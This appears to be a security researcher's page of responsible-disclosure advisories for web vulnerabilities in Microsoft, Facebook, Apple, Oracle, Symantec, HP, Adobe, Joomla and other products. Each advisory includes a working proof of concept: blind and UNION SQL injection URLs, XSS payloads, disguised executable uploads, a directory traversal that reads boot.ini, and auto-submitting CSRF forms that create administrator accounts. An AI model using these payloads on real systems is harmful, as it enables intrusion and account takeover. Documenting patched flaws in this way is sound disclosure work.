Microsoft Bug #2: Blind SQL Injection Vulnerability Found in careers.microsoft.com

Description
Sow Ching Shiong, an independent vulnerability researcher has discovered a Blind SQL Injection vulnerability in careers.microsoft.com, which can be exploited by an attacker to conduct Blind SQL injection attacks.

Proof of concept URLs which will cause a time delay of 25 seconds are provided below:

• http://careers.microsoft.com/Feed/Search.ashx?ss=xss&jc=all&pr=all&dv=1));WAITFOR DELAY '0:0:25'--&ct=all&rg=all&lang=en
• http://careers.microsoft.com/Feed/Search.ashx?ss=xss&jc=all&pr=1));WAITFOR DELAY '0:0:25'--&dv=all&ct=all&rg=all&lang=en
• https://careers.microsoft.com/search.aspx?ss=xss&jc=all&pr=all&dv=1));WAITFOR DELAY '0:0:25'--&ct=all&rg=all&lang=en
• https://careers.microsoft.com/search.aspx?ss=xss&jc=all&pr=1));WAITFOR DELAY '0:0:25'--&dv=all&ct=all&rg=all&lang=en

Conclusion
This vulnerability has been confirmed and patched by Microsoft Security Team. I would like to thank them for their quick response to my report.

Microsoft White Hat
http://technet.microsoft.com/en-us/security/cc308575

Read More

Facebook Bug #3: Arbitrary File Upload Vulnerability Found in attachments.facebook.com

Description
Sow Ching Shiong, an independent vulnerability researcher has discovered an Arbitrary File Upload vulnerability in attachments.facebook.com, which can be exploited by an attacker to compromise a victim's computer system.

Proof of concept
HTTP Request

===========

POST /ajax/messaging/upload.php HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: multipart/form-data; boundary=---------------------------7db2e171a0068
Accept-Encoding: gzip, deflate
Host: attachments.facebook.com
Content-Length: 194182
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: [information removed]

-----------------------------7db2e171a0068
Content-Disposition: form-data; name="post_form_id"

[information removed]
-----------------------------7db2e171a0068
Content-Disposition: form-data; name="fb_dtsg"

[information removed]
-----------------------------7db2e171a0068
Content-Disposition: form-data; name="id"

[information removed]
-----------------------------7db2e171a0068
Content-Disposition: form-data; name="attachment"; filename="..exe"
Content-Type: application/octet-stream

Conclusion
This vulnerability has been confirmed and patched by Facebook Security Team. I would like to thank them for their quick response to my report.

Facebook White Hat
https://www.facebook.com/whitehat

Read More

Facebook Bug #2: Arbitrary File Upload Vulnerability Found in attachments.facebook.com

Description
Sow Ching Shiong, an independent vulnerability researcher has discovered an Arbitrary File Upload vulnerability in attachments.facebook.com, which can be exploited by an attacker to compromise a victim's computer system.

Proof of concept
HTTP Request

===========

POST /ajax/messaging/upload.php HTTP/1.1
Host: attachments.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
DNT: 1
Proxy-Connection: keep-alive
Cookie: [information removed]
Content-Type: multipart/form-data; boundary=---------------------------265001916915724
Content-Length: 194200

-----------------------------265001916915724
Content-Disposition: form-data; name="post_form_id"

[information removed]
-----------------------------265001916915724
Content-Disposition: form-data; name="fb_dtsg"

[information removed]
-----------------------------265001916915724
Content-Disposition: form-data; name="id"

[information removed]
-----------------------------265001916915724
Content-Disposition: form-data; name="attachment"; filename="notepad.exe."
Content-Type: application/octet-stream

Conclusion
This vulnerability has been confirmed and patched by Facebook Security Team. I would like to thank them for their quick response to my report.

Facebook White Hat
https://www.facebook.com/whitehat

Read More

Microsoft Bug #1: Cross-Site Scripting (XSS) Found in connect.microsoft.com

Description
Sow Ching Shiong, an independent vulnerability researcher has discovered a Cross-Site Scripting (XSS) vulnerability in connect.microsoft.com, which can be exploited by an attacker to conduct XSS attacks.

Proof of concept
Tested in IE9 with XSS filter enabled
============================
http://connect.microsoft.com/sqlserver/searchresults.aspx?UserHandle=%2522%253E%2527%253E%253Cscript%2520%253Ealert%2528/XSS by Sow Ching Shiong/%2529%253B%253C%252Fscript%2520%253E

Conclusion
This vulnerability has been confirmed and patched by Microsoft Security Team. I would like to thank them for their quick response to my report.

Microsoft White Hat
http://technet.microsoft.com/en-us/security/cc308575

Read More

Facebook Bug #1: Arbitrary File Upload Vulnerability Found in attachments.facebook.com

Description
Sow Ching Shiong, an independent vulnerability researcher has discovered an Arbitrary File Upload vulnerability in attachments.facebook.com, which can be exploited by an attacker to compromise a victim's computer system.

Proof of concept
HTTP Request

===========

POST /ajax/messaging/upload.php HTTP/1.1
Host: attachments.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
DNT: 1
Proxy-Connection: keep-alive
Cookie: [information removed]
Content-Type: multipart/form-data; boundary=---------------------------4827543632391
Content-Length: 194188

-----------------------------4827543632391
Content-Disposition: form-data; name="post_form_id"

[information removed]
-----------------------------4827543632391
Content-Disposition: form-data; name="fb_dtsg"

[information removed]
-----------------------------4827543632391
Content-Disposition: form-data; name="id"

[information removed]
-----------------------------4827543632391
Content-Disposition: form-data; name="attachment"; filename="notepad.EXE"
Content-Type: application/octet-stream

Conclusion
This vulnerability has been confirmed and patched by Facebook Security Team. I would like to thank them for their quick response to my report.

Facebook White Hat
https://www.facebook.com/whitehat

Read More

Twitter Bug #1: Cross-Site Scripting (XSS) Found in twitter.com

Description
Sow Ching Shiong, an independent vulnerability researcher has discovered a Cross-Site Scripting (XSS) vulnerability in twitter.com, which can be exploited by an attacker to conduct XSS attacks.

Proof of concept
https://twitter.com/intent/follow?original_referer=javascript:alert(document.cookie);&region=follow_link&screen_name=twitterapi&source=followbutton&variant=2.0

Conclusion
This vulnerability has been confirmed and patched by Twitter Security Team. I would like to thank them for their quick response to my report.

Twitter White Hat
https://twitter.com/about/security

Read More

Apple Bug #1: Cross-Site Scripting (XSS) Found in consultants.apple.com

Description
Sow Ching Shiong, an independent vulnerability researcher has discovered a Cross-Site Scripting (XSS) vulnerability in consultants.apple.com, which can be exploited by an attacker to conduct XSS attacks.

Proof of concept
http://consultants.apple.com/au/locator_results.php?sl=AU&citystate=VIC&page=2<script>alert(document.cookie)</script>

Conclusion
This vulnerability has been confirmed and patched by Apple Security Team. I would like to thank them for their quick response to my report.

Apple White Hat
http://support.apple.com/kb/HT1318

Read More

Oracle iPlanet Web Server 7.0.9 Multiple Cross-Site Scripting (XSS) Vulnerabilities

Description
Oracle iPlanet Web Server is a web server designed for medium and large business applications. Oracle iPlanet Web Server builds on the earlier Sun ONE Web Server, iPlanet Web Server, and Netscape Enterprise Server products.

Sow Ching Shiong, an independent vulnerability researcher has discovered multiple Cross-Site Scripting vulnerabilities in Oracle iPlanet Web Server. These issues were discovered in a default installation of Oracle iPlanet Web Server 7.0.9. Other earlier versions may also be affected.

Proof of concept
Reflected XSS
===========

• http://[target]:8800/admingui/version/Masthead.jsp?productNameSrc='"--></style></script><script>alert(/XSS/)</script>&versionFile=../version/copyright?__token__=&productNameHeight=42&productNameWidth=221
• http://[target]:8800/admingui/version/Masthead.jsp?productNameSrc=../images/VersionProductName.png&versionFile=../version/copyright?__token__=&productNameHeight='"--></style></script><script>alert(/XSS/)</script>&productNameWidth=221
• http://[target]:8800/admingui/version/Masthead.jsp?productNameSrc=../images/VersionProductName.png&versionFile=../version/copyright?__token__=&productNameHeight=42&productNameWidth='"--></style></script><script>alert(/XSS/)</script>

Stored XSS
=========

• http://[target]:8800/admingui/cchelp2/Navigator?windowTitle=&firstLoad=true&appName='"--></style></script><script>alert(/Stored XSS 1/)</script>&helpFile=&pathPrefix=
• http://[target]:8800/admingui/cchelp2/Navigator?windowTitle=&firstLoad=true&appName=admingui&helpFile=&pathPrefix='"--></style></script><script>alert(/Stored XSS 2/)</script>

To trigger Stored XSS:
=================
http://[target]:8800/admingui/cchelp2/Navigator?windowTitle=&firstLoad=true&appName=TESTING&helpFile=&pathPrefix=

Solution
Oracle has released patches which address these issues. Please see the references for more information.

References
Vendor URL: http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html#AppendixSUNS
Secunia: http://secunia.com/advisories/43942/

Disclosure Timeline
2011-03-29 - Vulnerabilities discovered.
2011-03-29 - Vulnerabilities reported to Secunia.
2011-04-07 - Secunia confirmed the vulnerabilities and contacted the vendor.
2012-04-17 - Patch released.
2012-04-18 - Advisory published by Secunia.

Read More

Apache Camel 2.7.0 Multiple Cross-Site Scripting (XSS) Vulnerabilities

Description
Apache Camel is a versatile open-source integration framework based on known Enterprise Integration Patterns. Camel empowers you to define routing and mediation rules in a variety of domain-specific languages, including a Java-based Fluent API, Spring or Blueprint XML Configuration files, and a Scala DSL.

Sow Ching Shiong, an independent vulnerability researcher has discovered multiple Cross-Site Scripting vulnerabilities in Apache Camel. These issues were discovered in a default installation of Apache Camel 2.7.0. Other earlier versions may also be affected.

Proof of concept
Reflected XSS
===========
http://[target]:8161/demo/portfolioPublish?count=1&refresh='"--></style></script><script>alert(/XSS/)</script>&stocks=SUNW

Permanent XSS
============
http://[target]:8161/camel/endpoints/mock:someName<iframe src="javascript:alert('Permanent XSS')"

To trigger Permanent XSS:
====================
http://[target]:8161/camel/endpoints



Solution
Update to version 2.7.2 or later.

Reference
Vendor URL: https://issues.apache.org/jira/browse/CAMEL-3991

Disclosure Timeline
2011-05-06 - Vulnerabilities discovered.
2011-05-06 - Vulnerabilities reported to Secunia.
2011-05-06 - Secunia confirmed the vulnerabilities and contacted the vendor.
2011-05-19 - Patch released.
2011-05-19 - Advisory published by Apache.

Read More

HP System Management Homepage 6.2.2.7 Cross-Site Request Forgery (CSRF) Vulnerability

Description
HP System Management Homepage is a web-based interface that consolidates and simplifies the management of individual ProLiant and Integrity servers running Microsoft Windows or Linux operating systems, or HP 9000 and HP Integrity servers running HP-UX 11i.

Sow Ching Shiong, an independent vulnerability researcher has discovered Cross-Site Request Forgery vulnerability in HP System Management Homepage. This issue was discovered in a default installation of HP System Management Homepage 6.2.2.7. Other earlier versions may also be affected.

Proof of concept
<html>
<body>
<form action="https://[target]:2381/proxy/SetSMHData" id="csrf" method="post">
<input type="hidden" name="admin-group" value="Users" />
<input type="hidden" name="operator-group" value="" />
<input type="hidden" name="user-group" value="" />
</form>
<script>
document.getElementById('csrf').submit();
</script>
</body>
</html>

Solution
HP has provided HP System Management Homepage v7.0 or subsequent to resolve the vulnerabilities. Please see the references for more information.

References
Vendor URL: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03280632
Secunia: http://secunia.com/advisories/43012/

Disclosure Timeline
2011-01-21 - Vulnerability discovered.
2011-01-21 - Vulnerability reported to Secunia.
2011-01-21 - Secunia confirmed the vulnerability and contacted the vendor.
2012-04-11 - Advisory published by Secunia since it has been coordinated for more than a year.
2012-04-19 - Patch released.
2012-04-20 - Advisory updated by Secunia.

Read More

Joomla! CMS 2.5.1 Blind SQL Injection Vulnerability

Description
Joomla! is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets and a model–view–controller (MVC) Web application framework that can also be used independently.

Stratsec vulnerability researcher, Sow Ching Shiong has discovered Blind SQL Injection vulnerability in Joomla! CMS. This issue was discovered in a default installation of Joomla! CMS 2.5.1. Other earlier versions may also be affected.

Proof of concept URLs which will cause a time delay of 30 seconds are provided below:

• http://[target]/[path]/index.php/using-joomla/extensions/components/search-component/smart-search?Itemid=466&option=1&q=3&searchword=Search...&task=search'%2b(SELECT 1 FROM (SELECT SLEEP(30))A)%2b'
• http://[target]/[path]/joomla/index.php?Itemid=%27%2b(SELECT%201%20FROM%20(SELECT%20SLEEP(30))A)%2b%27
• http://[target]/[path]/joomla/index.php?option=1&searchword={searchTerms}&Itemid='%2b(SELECT 1 FROM (SELECT SLEEP(30))A)%2b'

Solution
Update to version 2.5.2 or later.

References
Vendor URL: http://developer.joomla.org/security/news/391-20120301-core-sql-injection.html
Stratsec: http://www.stratsec.net/Research/Advisories/Joomla-CMS-Blind-SQL-Injection-(SS-2012-004)

Disclosure Timeline
2012-02-29 - Vulnerability discovered.
2012-02-29 - Vulnerability reported to vendor.
2012-03-01 - Vendor acknowledged and confirmed the vulnerability.
2012-03-05 - Patch released.
2012-03-19 - Advisory published by Stratsec.

Read More

Symantec IM Manager 8.4.17 SQL Injection and Cross-Site Scripting (XSS) Vulnerabilities

Description
Symantec IM Manager offers instant messaging management and security with support for public IM networks and enterprise IM platforms including AOL, Jabber, IBM Lotus Instant Messaging, ICQ, MSN Messenger, Microsoft Live Communications Server, Reuters, Yahoo! and GoogleTalk.

Sow Ching Shiong, an independent vulnerability researcher has discovered multiple vulnerabilities in Symantec IM Manager. These issues were discovered in a default installation of Symantec IM Manager 8.4.17. Other earlier versions may also be affected.

Proof of concept
SQL Injection
==========
http://[target]/IMManager/admin/IMAdminPolicyEnfQry.asp?PolicyEnfType=-1%20UNION%20ALL%20SELECT%20null,(char(126)%2bchar(39)%2b(Select%20@@version)%2bchar(39)%2bchar(126))--

Cross-Site Scripting (XSS)
====================

• http://[target]/IMManager/admin/IMAdminSystemDashboard.asp?post=yes&refreshRateSetting='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E
• http://[target]/IMManager/admin/IMAdminTOC_simple.asp?nav='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E&menuitem=newReports
• http://[target]/IMManager/admin/IMAdminTOC_simple.asp?nav=reports&menuitem='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E
• http://[target]/IMManager/admin/IMAdminEdituser.asp?action='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E

Solution
Symantec has released patches which address these issues. Please see the references for more information.

References
Vendor URL: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2011&suid=20110929_00
Secunia: http://secunia.com/advisories/43157/

Disclosure Timeline
2011-02-18 - Vulnerabilities discovered.
2011-02-18 - Vulnerabilities reported to Secunia.
2011-02-23 - Secunia confirmed the vulnerabilities and contacted the vendor.
2011-09-29 - Patch released.
2011-09-30 - Advisory published by Secunia.

Read More

Pligg CMS 1.1.4 Cross-Site Scripting (XSS) Vulnerability

Description
Pligg is an open source CMS (Content Management System) that you can download and use for free. Pligg CMS provides social publishing software that encourages visitors to register on your website so that they can submit content and connect with other users.

Sow Ching Shiong, an independent vulnerability researcher has discovered Cross-Site Scripting vulnerability in Pligg CMS. This issue was discovered in a default installation of Pligg CMS 1.1.4. Other earlier versions may also be affected.

Proof of concept
http://[target]/pligg/search.php?adv=1&advancesearch=&nbsp;Search&nbsp;&date=1</title><script>alert(/XSS/)</script>&scategory=1&scomments=1&search=&sgroup=3&slink=3&stags=1&status=all&suser=1

Solution
Update to version 1.2.0 or later.

References
Vendor URL: http://forums.pligg.com/downloads.php?do=file&id=13
Secunia: http://secunia.com/advisories/44352/

Disclosure Timeline
2011-04-24 - Vulnerability discovered.
2011-04-24 - Vulnerability reported to Secunia.
2011-04-26 - Secunia confirmed the vulnerability and contacted the vendor.
2011-09-18 - Patch released.
2011-09-20 - Advisory published by Secunia.

Read More

Symantec Endpoint Protection Manager 11.0.6 Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS) Vulnerabilities

Description
Symantec End point Protection Manager Console lets user centrally manages the Symantec End point Protection clients. From the console user can install clients, set and enforce a securit ypolicy, and monitor and report on the clients. The console can be run from the computer hosting Symantec Endpoint Protection Manager or remotely through a Web-based interface.

Sow Ching Shiong, an independent vulnerability researcher has discovered multiple vulnerabilities in Symantec Endpoint Protection Manager. These issues were discovered in a default installation of Symantec Endpoint Protection Manager 11.0.6. Other earlier versions may also be affected.

Proof of concept
Cross-Site Request Forgery (CSRF)
==========================
<html>
<body>
<form action="https://[target]:8443/portal/Settings.jsp?action=NewAccount"
id="csrf" method="post">
<input type="hidden" name="spcName" value="attacker" />
<input type="hidden" name="spcUsername" value="attacker" />
<input type="hidden" name="spcNewPwd" value="passwd123" />
<input type="hidden" name="spcNewPwd2" value="passwd123" />
<input type="hidden" name="group1" value="Admin" />
<input type="hidden" name="btnSubmit" value="Create+Account" />
</form>
<script>
document.getElementById('csrf').submit();
</script>
</body>
</html>

Cross-Site Scripting (XSS)
====================

• https://[target]:8443/console/apps/sepm/?>'"><script>alert(1)</script>
• https://[target]:8443/portal/Help.jsp?token='"--></style></script><script>alert(1)</script>

Solution
Symantec has released patches which address these issues. Please see the references for more information.

References
Vendor URL: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2011&suid=20110810_00
Secunia: http://secunia.com/advisories/43662/

Disclosure Timeline
2011-03-07 - Vulnerabilities discovered.
2011-03-07 - Vulnerabilities reported to Secunia.
2011-03-09 - Secunia confirmed the vulnerabilities and contacted the vendor.
2011-08-10 - Patch released.
2011-08-11 - Advisory published by Secunia.

Read More

Oracle Secure Backup 10.3.0.3.0 Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS) Vulnerabilities

Description
Oracle Secure Backup is a general-purpose network data protection tool that simplifies and automates the backup and restore of files on a file system. The software can also serve as a media management layer for Recovery Manager through the SBT interface.

Sow Ching Shiong, an independent vulnerability researcher has discovered multiple vulnerabilities in Oracle Secure Backup. These issues were discovered in a default installation of Oracle Secure Backup 10.3.0.3.0. Other earlier versions may also be affected.

Proof of concept
Cross-Site Request Forgery (CSRF)
==========================
<html>
<body>
<form action="https://[target]/index.php" id="csrf" method="post">
<input type="hidden" name="process" value="1" />
<input type="hidden" name="tab" value="2" />
<input type="hidden" name="mode" value="2" />
<input type="hidden" name="button" value="Ok" />
<input type="hidden" name="screen" value="d" />
<input type="hidden" name="selector%5B%5D" value="" />
<input type="hidden" name="changeobject" value="attacker" />
<input type="hidden" name="upassword" value="passwd123" />
<input type="hidden" name="vpassword" value="passwd123" />
<input type="hidden" name="oclass" value="admin" />
<input type="hidden" name="uclass" value="" />
<input type="hidden" name="givenname" value="" />
<input type="hidden" name="unixname" value="" />
<input type="hidden" name="unixgroup" value="" />
<input type="hidden" name="ndmpserveruser" value="no" />
<input type="hidden" name="emailaddress" value="" />
<input type="hidden" name="op" value="Add" />
</form>
<script>
document.getElementById('csrf').submit();
</script>
</body>
</html>

Cross-Site Scripting (XSS)
====================

• https://[target]/login.php?clear=yes&tab='%20stYle='x:expre/**/ssion(alert(1))%20&mode=3
• https://[target]/login.php?clear=yes&tab=3&mode='%20stYle='x:expre/**/ssion(alert(1))

Solution
Oracle has released patches which address these issues. Please see the references for more information.

References
Vendor URL: http://www.oracle.com/technetwork/topics/security/cpujuly2011-313328.html
Secunia: http://secunia.com/advisories/43011/

Disclosure Timeline
2011-01-21 - Vulnerabilities discovered.
2011-01-21 - Vulnerabilities reported to Secunia.
2011-01-21 - Secunia confirmed the vulnerabilities and contacted the vendor.
2011-07-19 - Patch released.
2011-07-20 - Advisory published by Secunia.

Read More

Trend Micro Control Manager 5.5 Directory Traversal Vulnerability

Description
Trend Micro Control Manager provides a convenient centralized security management console that is designed to minimize administrative complexity and work with Trend Micro solutions to maximize security.

Sow Ching Shiong, an independent vulnerability researcher has discovered Cross-Site Scripting vulnerability in Trend Micro Control Manager. This issue was discovered in a default installation of Trend Micro Control Manager 5.5 Build 1250 (Hot Fix: 1350). Other earlier versions may also be affected.

Proof of concept

Solution
Trend Micro has released patches which address this issue. Please see the references for more information.

References
Vendor URL: http://downloadcenter.trendmicro.com/index.php?prodid=7#fragment-1845
Secunia: http://secunia.com/advisories/44134/

Disclosure Timeline
2011-04-09 - Vulnerability discovered.
2011-04-09 - Vulnerability reported to Secunia.
2011-04-29 - Secunia confirmed the vulnerability and contacted the vendor.
2011-06-15 - Patch released.
2011-06-16 - Advisory published by Secunia.

Read More

Trend Micro Control Manager 5.5 Cross-Site Scripting (XSS) Vulnerability

Description
Trend Micro Control Manager provides a convenient centralized security management console that is designed to minimize administrative complexity and work with Trend Micro solutions to maximize security.

Sow Ching Shiong, an independent vulnerability researcher has discovered Cross-Site Scripting vulnerability in Trend Micro Control Manager. This issue was discovered in a default installation of Trend Micro Control Manager 5.5 Build 1250 (Hot Fix: 1350). Other earlier versions may also be affected.

Proof of concept
https://[target]/commoncgi/servlet/CCGIServlet?ApHost=SLF_PRODUCT_TVCS"><script>alert(/XSS/)</script>&CGIAlias=SLF_PRODUCT_TVCS&Page=

Solution
Trend Micro has released patches which address this issue. Please see the references for more information.

References
Vendor URL: http://downloadcenter.trendmicro.com/index.php?prodid=7#fragment-1845
Secunia: http://secunia.com/advisories/44134/

Disclosure Timeline
2011-04-09 - Vulnerability discovered.
2011-04-09 - Vulnerability reported to Secunia.
2011-04-28 - Secunia confirmed the vulnerability and contacted the vendor.
2011-06-15 - Patch released.
2011-06-16 - Advisory published by Secunia.

Read More

Adobe ColdFusion 9.0.1.274733 Cross-Site Request Forgery (CSRF) Vulnerability

Description
Adobe ColdFusion application server enables developers to rapidly build, deploy, and maintain robust Internet applications for the enterprise.

Sow Ching Shiong, an independent vulnerability researcher has discovered Cross-Site Request Forgery vulnerability in Adobe ColdFusion. This issue was discovered in a default installation of Adobe ColdFusion 9.0.1.274733. Other earlier versions may also be affected.

Proof of concept
<html>

<body>

<form action="http://[target]:8500/CFIDE/administrator/security/useredit.cfm" id="csrf" method="post">

<input type="hidden" name="uname" value="attacker" />

<input type="hidden" name="password1" value="passwd123" />

<input type="hidden" name="password2" value="passwd123" />

<input type="hidden" name="Description" value="" />

<input type="hidden" name="userallowrds" value="true" />

<input type="hidden" name="userallowadministrative" value="true" />

<input type="hidden" name="userallow" value="adminapi" />

<input type="hidden" name="grantedRoles" value="coldfusion.collections,coldfusion.datasources,coldfusion.flexdataservices,coldfusion.migrateveritycollections,coldfusion.solrserver,coldfusion.verityk2server,coldfusion.webservices,coldfusion.codeanalyzer,coldfusion.debugging,coldfusion.licensescanner,coldfusion.logging,coldfusion.scheduledtasks,coldfusion.systemprobes,coldfusion.enterprisemanager,coldfusion.eventgateways,coldfusion.cfxtags,coldfusion.corbaconnectors,coldfusion.customtagpaths,coldfusion.applets,coldfusion.packagingdeployment,coldfusion.sandboxsecurity,coldfusion.monitoring,coldfusion.serversettings,coldfusion.serversettingssummary" />

<input type="hidden" name="grantedSandboxes" value="C:\ColdFusion9\wwwroot\CFIDE\,C:\ColdFusion9\wwwroot\WEB-INF\" />

<input type="hidden" name="grantedServices" value="mail,document,pdf,image,chart,pop,upload" />

<input type="hidden" name="adminaction" value="add" />

</form>

<script>

document.getElementById('csrf').submit();

</script>

</body>

</html>

Solution
Adobe has released patches which address this issue. Please see the references for more information.

References
Vendor URL: http://www.adobe.com/support/security/bulletins/apsb11-14.html
Secunia: http://secunia.com/advisories/43013/

Disclosure Timeline
2011-01-21 - Vulnerability discovered.
2011-01-21 - Vulnerability reported to Secunia.
2011-01-21 - Secunia confirmed the vulnerability and contacted the vendor.
2011-06-14 - Patch released.
2011-06-15 - Advisory published by Secunia.

Read More

Sybase EAServer 6.3.1 Directory Traversal Vulnerability

Description
Sybase EAServer is the leading solution for distributed and Web-enabled PowerBuilder applications. EA Server can be used to run multiple websites, portals or Web applications. It allows access from Web browsers and provides a development platform for enterprise Web services.

Sow Ching Shiong, an independent vulnerability researcher has identified a Directory Traversal vulnerability in Sybase EAServer. This issue was discovered in a default installation of Sybase EAServer 6.3.1 Developer Edition running on Windows 2003 Server. Other earlier versions may also be affected.

Proof of concept
http://[target]:8000/images//.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\boot.ini



Solution
Sybase has released patches which address this issue. Please see the references for more information.

References
Vendor URL: http://www.sybase.com/detail?id=1093216
iDefense: http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=912
Secunia: http://secunia.com/advisories/44666/

Disclosure Timeline
2011-01-25 - Vulnerability discovered.
2011-01-25 - Vulnerability reported to iDefense.
2011-03-29 - iDefense confirmed the vulnerability and contacted the vendor.
2011-05-23 - Patch released.
2011-05-25 - Advisory published by iDefense.

Read More

F-Secure Policy Manager Web Reporting 9.00.30231 Path Disclosure and Cross-Site Scripting (XSS) Vulnerability

Description
F-Secure Policy Manager Web Reporting allow administrators to identify computers that are unprotected or vulnerable to virus outbreaks before they actually occur.

Sow Ching Shiong, an independent vulnerability researcher has identified a Path Disclosure and Cross-Site Scripting vulnerability in F-Secure Policy Manager Web Reporting. This issue was discovered in a default installation of F-Secure Policy Manager Web Reporting 9.00.30231. Other earlier versions may also be affected.

Proof of concept
Path Disclosure
============
http://[target]:8081/report/infection-table.html



Cross-Site Scripting (XSS)
====================
http://[target]:8081/'"--></style></script><script>alert(1)</script>



Solution
F-Secure recommends that administrators of the affected systems patch or upgrade their systems.

References
Vendor URL: http://www.f-secure.com/en/web/labs_global/fsc-2011-2
Secunia: http://secunia.com/advisories/43049/

Disclosure Timeline
2011-01-17 - Vulnerability discovered.
2011-01-17 - Vulnerability reported to Secunia.
2010-01-25 - Secunia confirmed the vulnerability and contacted the vendor.
2011-02-24 - Patch released.
2011-02-24 - Advisory published by Secunia.

Read More

HP Power Manager 4.3.2 Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS) Vulnerabilities

Description
HP Power Manager (HPPM) is a web-based application that enables administrators to manage an HP UPS from a browser-based management console. Administrators can monitor, manage, and control a single UPS locally and remotely.

Sow Ching Shiong, an independent vulnerability researcher has discovered multiple vulnerabilities in HP Power Manager. These issues were discovered in a default installation of HP Power Manager 4.3.2. Other earlier versions may also be affected.

Proof of concept
Cross-Site Request Forgery (CSRF)
==========================
<html>
<body>
<form action="http://[target]/goform/formSetUsers" id="csrf" method="post">
<input type="hidden" name="name9" value="attacker" />
<input type="hidden" name="pass9" value="passwd123" />
<input type="hidden" name="rpass9" value="passwd123" />
<input type="hidden" name="admin9" value="on" />
<input type="hidden" name="actionType" value="1" />
</form>
<script>
document.getElementById('csrf').submit();
</script>
</body>
</html>

Cross-Site Scripting (XSS)
====================

• http://[target]/contents/exportlogs.asp?logType=Application%253cscript%2b%253ealert%25281%2529%253b%253c%252fscript%2b%253e
• http://[target]/contents/applicationlogs.asp?SORTCOL=2&SORTORD=2"%20onMouseOver%3dalert%281%29%2f%2f&TIME=0&PAGE=1&ITEMSPERPAGE=20
• http://[target]/contents/applicationlogs.asp?SORTCOL=2"%20onMouseOver%3dalert%281%29%2f%2f&SORTORD=2&TIME=0&PAGE=1&ITEMSPERPAGE=20
• http://[target]/contents/pagehelp.asp?Id=About%253cscript%2b%253ealert%25281%2529%253b%253c%252fscript%2b%253e

Solution
HP recommends the following:

• Open a browser instance, log on to HPPM, perform needed task, and log off from HPPM.
• Do not visit untrusted web sites while logged on to HPPM.
• Use a firewall to limit access to HPPM.

References
Vendor URL: http://www.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02711131
Secunia: http://secunia.com/advisories/43058/

Disclosure Timeline
2011-01-25 - CSRF Vulnerability discovered.
2011-01-25 - CSRF Vulnerability reported to Secunia.
2011-01-26 - Secunia confirmed the vulnerability and contacted the vendor.
2011-02-07 - HP released recommendation for CSRF.
2011-02-08 - Advisory published by Secunia.
2011-02-10 - XSS Vulnerability discovered.
2011-02-10 - XSS Vulnerability reported to Secunia.
2011-02-10 - Secunia confirmed the vulnerability and contacted the vendor.
2011-03-09 - HP released recommendation for XSS. 
2011-03-10 - Advisory updated by Secunia.

Read More

PrestaShop 1.3.3 Cross-Site Scripting (XSS) Vulnerability

Description
PrestaShop is an e-commerce solution which is free and open source. It supports payment gateways such as Google Checkout, Authorize.net, Skrill, PayPal and Payments Pro via API. Further payment modules are offered commercially.

Sow Ching Shiong, an independent vulnerability researcher has identified a Cross-Site Scripting vulnerability in PrestaShop. This issue was discovered in a default installation of PrestaShop 1.3.3. Other earlier versions may also be affected.

Proof of concept
http://[target]/[path]/search.php?'"--></style></script><script>alert(1)</script>



Solution
Update to version 1.3.4 or later.

References
Vendor URL: http://www.prestashop.com/en/developers-versions/changelog/1.3.4.0
Secunia: http://secunia.com/advisories/42503/

Disclosure Timeline
2010-12-06 - Vulnerability discovered.
2010-12-06 - Vulnerability reported to Secunia.
2010-12-10 - Secunia confirmed the vulnerability and contacted the vendor.
2010-12-22 - Patch released.
2010-12-22 - Advisory published by Secunia.

Read More

CompleteFTP Server 4.0.2 Directory Traversal Vulnerability

Description
CompleteFTP Server is a high-performance Windows FTP server supporting FTP, FTPS, SFTP and SCP. It features both Windows and non-Windows users and a fully configurable virtual file-system.

Sow Ching Shiong, an independent vulnerability researcher has identified a Directory Traversal vulnerability in CompleteFTP Server. This issue was discovered in a default installation of CompleteFTP Server 4.0.2. Other earlier versions may also be affected.

Proof of concept





Solution
Update to version 4.0.3 or later.

References
Vendor URL: http://www.enterprisedt.com/products/completeftp/history.html
Secunia: http://secunia.com/advisories/39852/

Disclosure Timeline
2010-05-18 - Vulnerability discovered.
2010-05-18 - Vulnerability reported to Secunia.
2010-05-19 - Secunia confirmed the vulnerability and contacted the vendor.
2010-06-02 - Patch released.
2010-06-02 - Advisory published by Secunia.

Read More

SnugServer FTP Server 4.3.0.126 Directory Traversal Vulnerability

Description
SnugServer is an Email Server, Web Server, FTP Server, NewsServer and ListServer. It's your all-in-one solution to managing your Internet Presence. Send/receive emails through your own server, host your own website(s) and so much more.

